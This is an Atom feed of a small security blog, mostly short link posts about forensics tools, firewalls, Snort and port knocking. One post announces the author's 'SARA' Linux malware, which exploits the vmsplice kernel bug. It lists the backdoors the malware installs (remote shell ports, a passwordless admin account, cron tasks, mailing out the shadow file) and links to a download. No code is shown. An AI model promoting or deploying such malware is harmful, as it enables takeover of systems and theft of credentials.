<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-18867118</id><updated>2011-04-21T17:47:07.390-07:00</updated><title type='text'>si0ux</title><subtitle type='html'>My technical blog</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://si0ux.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://si0ux.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>si0ux</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://www.debianart.org/cchost/people/si0ux/andre-desenho2.png'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>8</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-18867118.post-1710536655356237322</id><published>2008-06-09T04:25:00.000-07:00</published><updated>2008-06-09T04:32:56.532-07:00</updated><title type='text'>Palestra de Segurança de Redes de Computadores</title><content type='html'>Segue abaixo um link para uma apresentação que usei em uma palestra na escola Coopam aqui de Orlândia. Esta palestra foi ministrada para os universitários dos cursos de Sistemas de Informação e Administração de Empresas. Falei sobre tópicos básicos do assunto, técnicas de ataques e mecanismos de defesa.&lt;br /&gt;&lt;br /&gt;Link:&lt;br /&gt;&lt;a href="http://rapidshare.com/files/121181348/seguranca.pdf.html"&gt;http://rapidshare.com/files/121181348/seguranca.pdf.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18867118-1710536655356237322?l=si0ux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://si0ux.blogspot.com/feeds/1710536655356237322/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18867118&amp;postID=1710536655356237322' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/1710536655356237322'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/1710536655356237322'/><link rel='alternate' type='text/html' href='http://si0ux.blogspot.com/2008/06/palestra-de-segurana-de-redes-de.html' title='Palestra de Segurança de Redes de Computadores'/><author><name>si0ux</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://www.debianart.org/cchost/people/si0ux/andre-desenho2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18867118.post-2816756204434152571</id><published>2008-04-10T11:25:00.000-07:00</published><updated>2008-04-10T11:26:34.145-07:00</updated><title type='text'>Examining thumbs.db files with Vinetto</title><content type='html'>Vinetto is a forensics tool to examine Thumbs.db files.&lt;br /&gt;It is a command line python script that works on Linux, Mac OS X and Cygwin(win32).&lt;br /&gt;The Windows systems (98, ME, 2000, XP and 2003 Server) can store thumbnails and metadata of the picture files contained in the directories of its FAT32 or NTFS filesystems.&lt;br /&gt;The thumbnails and associated metadata are stored in Thumbs.db files.&lt;br /&gt;The Thumbs.db files are undocumented OLE structured files.&lt;br /&gt;&lt;br /&gt;Once a picture file has been deleted from the filesystem, the related thumbnail and associated metada remain stored in the Thumbs.db file. So, the data contained in those thumbs.db files are an helpful source of information for the forensics investigator.Vinetto extracts the thumbnails and associated metadata from the Thumbs.db files...&lt;br /&gt;&lt;br /&gt;Link: &lt;a href="http://vinetto.sourceforge.net/"&gt;http://vinetto.sourceforge.net/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18867118-2816756204434152571?l=si0ux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://si0ux.blogspot.com/feeds/2816756204434152571/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18867118&amp;postID=2816756204434152571' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/2816756204434152571'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/2816756204434152571'/><link rel='alternate' type='text/html' href='http://si0ux.blogspot.com/2008/04/examining-thumbsdb-files-with-vinetto.html' title='Examining thumbs.db files with Vinetto'/><author><name>si0ux</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://www.debianart.org/cchost/people/si0ux/andre-desenho2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18867118.post-8651755610117508493</id><published>2008-03-28T04:23:00.001-07:00</published><updated>2008-03-28T04:23:58.640-07:00</updated><title type='text'>Interactive Firewalls?</title><content type='html'>Really, its a great idea to improve users experience with Linux!&lt;br /&gt;&lt;br /&gt;Link:&lt;a href="http://blogs.warwick.ac.uk/bweber/entry/interactive_firewalls/"&gt; Interactive Firewalls&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18867118-8651755610117508493?l=si0ux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://si0ux.blogspot.com/feeds/8651755610117508493/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18867118&amp;postID=8651755610117508493' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/8651755610117508493'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/8651755610117508493'/><link rel='alternate' type='text/html' href='http://si0ux.blogspot.com/2008/03/interactive-firewalls.html' title='Interactive Firewalls?'/><author><name>si0ux</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://www.debianart.org/cchost/people/si0ux/andre-desenho2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18867118.post-5616747099306175640</id><published>2008-03-27T04:20:00.000-07:00</published><updated>2008-03-27T04:22:47.927-07:00</updated><title type='text'>Firefox Web Application Testing Tools</title><content type='html'>Lightweight and portable is always a benefit for web application exploitation tools. Take a look at this open-source plugin for Firefox and see how it fares against today's web applications.&lt;br /&gt;&lt;br /&gt;Link:&lt;br /&gt;&lt;a href="http://www.darknet.org.uk/2008/03/securitycompass-exploit-me-firefox-web-application-testing-tools/"&gt;Darknet.org&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18867118-5616747099306175640?l=si0ux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://si0ux.blogspot.com/feeds/5616747099306175640/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18867118&amp;postID=5616747099306175640' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/5616747099306175640'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/5616747099306175640'/><link rel='alternate' type='text/html' href='http://si0ux.blogspot.com/2008/03/firefox-web-application-testing-tools.html' title='Firefox Web Application Testing Tools'/><author><name>si0ux</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://www.debianart.org/cchost/people/si0ux/andre-desenho2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18867118.post-4616681723718404049</id><published>2008-03-25T06:26:00.000-07:00</published><updated>2008-03-25T06:44:52.336-07:00</updated><title type='text'>Snort-BR Updated</title><content type='html'>New site of Snort Brazilian Community!!!!&lt;br /&gt;&lt;br /&gt;Link: &lt;a href="http://www.snort.org.br/"&gt;http://www.snort.org.br&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18867118-4616681723718404049?l=si0ux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://si0ux.blogspot.com/feeds/4616681723718404049/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18867118&amp;postID=4616681723718404049' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/4616681723718404049'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/4616681723718404049'/><link rel='alternate' type='text/html' href='http://si0ux.blogspot.com/2008/03/snort-br-updated.html' title='Snort-BR Updated'/><author><name>si0ux</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://www.debianart.org/cchost/people/si0ux/andre-desenho2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18867118.post-5330878040739069817</id><published>2008-02-25T13:02:00.000-08:00</published><updated>2008-02-25T13:40:53.791-08:00</updated><title type='text'>Microsoft started a Protocols Program</title><content type='html'>Microsoft has started a &lt;a href="http://www.microsoft.com/protocols"&gt;Protocols Program&lt;/a&gt;. This project includes thousands of pages of documentation (in .pdf format) divided into categories like &lt;a href="http://www.microsoft.com/about/legal/intellectualproperty/protocols/mcpp.mspx"&gt;Microsoft Communications Protocol Program&lt;/a&gt; (MCPP, for "server software that interoperates with Windows desktop operating systems") and &lt;a href="http://www.microsoft.com/about/legal/intellectualproperty/protocols/wspp/wspp.mspx"&gt;Microsoft [Work Group] Server Protocol Program&lt;/a&gt; (WSPP, for "server software that interoperates with Microsoft Windows server and desktop operating systems to provide file, print, and user and group administration services"). I am frankly astounded by the number of documents available. Windows_Communication_Protocols.zip and Windows_Server_Protocols.zip are 314 MB total.  Documentation like this is a boon for those who develop protocol analyzers, network security inspection systems, and filtering products. Security analysts and reverse engineers will also like to read this material.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18867118-5330878040739069817?l=si0ux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://si0ux.blogspot.com/feeds/5330878040739069817/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18867118&amp;postID=5330878040739069817' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/5330878040739069817'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/5330878040739069817'/><link rel='alternate' type='text/html' href='http://si0ux.blogspot.com/2008/02/microsoft-started-protocols-program.html' title='Microsoft started a Protocols Program'/><author><name>si0ux</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://www.debianart.org/cchost/people/si0ux/andre-desenho2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18867118.post-877249810319346473</id><published>2008-02-19T06:39:00.000-08:00</published><updated>2008-02-22T10:41:28.866-08:00</updated><title type='text'>SARA Linux Malware</title><content type='html'>Hi all!&lt;br /&gt;I released today a basic malware for to exploit the vmsplice bug on Linux kernel.&lt;br /&gt;This program use the vulnerability for install some backdoors on system.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;UPDATED&lt;/span&gt;&lt;br /&gt;Actions:&lt;br /&gt; - disable INPUT rules on firewall&lt;br /&gt; - open the 1407 port for execute remote commands&lt;br /&gt; - open a bash session on 14071 port using the xinetd daemon&lt;br /&gt; - add a admin user without password&lt;br /&gt; - schedule malicious tasks on cron&lt;br /&gt; - mail the shadow file for a mail account&lt;br /&gt;&lt;br /&gt;Vulnerables systems: Linux 2.6.17 - 2.6.24.1&lt;br /&gt;&lt;br /&gt;Warning:&lt;br /&gt;THIS IS A MALWARE. DON'T RUN IT IF YOU DON'T KNOW&lt;br /&gt;WHAT YOU ARE DOING.&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;&lt;a href="http://coarseknocking.sourceforge.net/sara/sara-malware-0.0.2.tar.gz"&gt;http://coarseknocking.sourceforge.net/sara/sara-malware-0.0.2.tar.gz&lt;/a&gt;&lt;a href="http://coarseknocking.sourceforge.net/sara/sara-malware.tar.gz"&gt;&lt;br /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18867118-877249810319346473?l=si0ux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://si0ux.blogspot.com/feeds/877249810319346473/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18867118&amp;postID=877249810319346473' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/877249810319346473'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/877249810319346473'/><link rel='alternate' type='text/html' href='http://si0ux.blogspot.com/2008/02/sara-malware.html' title='SARA Linux Malware'/><author><name>si0ux</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://www.debianart.org/cchost/people/si0ux/andre-desenho2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18867118.post-7165807245246176914</id><published>2006-02-10T06:00:00.000-08:00</published><updated>2008-02-19T06:05:14.972-08:00</updated><title type='text'>Coarse Knocking 0.0.6</title><content type='html'>&lt;pre&gt;Coarse Knocking is my simple implementation of Port Knocking techniques. It sniffs&lt;br /&gt;network packets with determined keys and responds by executing firewall&lt;br /&gt;commands to open and close ports. In client mode, it sends packets with&lt;br /&gt;the appropriate key to a server.&lt;br /&gt;&lt;br /&gt;Link:&lt;br /&gt;&lt;a href="http://sourceforge.net/projects/coarseknocking/"&gt;http://sourceforge.net/projects/coarseknocking/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18867118-7165807245246176914?l=si0ux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://si0ux.blogspot.com/feeds/7165807245246176914/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18867118&amp;postID=7165807245246176914' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/7165807245246176914'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18867118/posts/default/7165807245246176914'/><link rel='alternate' type='text/html' href='http://si0ux.blogspot.com/2006/02/coarse-knocking-006.html' title='Coarse Knocking 0.0.6'/><author><name>si0ux</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://www.debianart.org/cchost/people/si0ux/andre-desenho2.png'/></author><thr:total>0</thr:total></entry></feed>
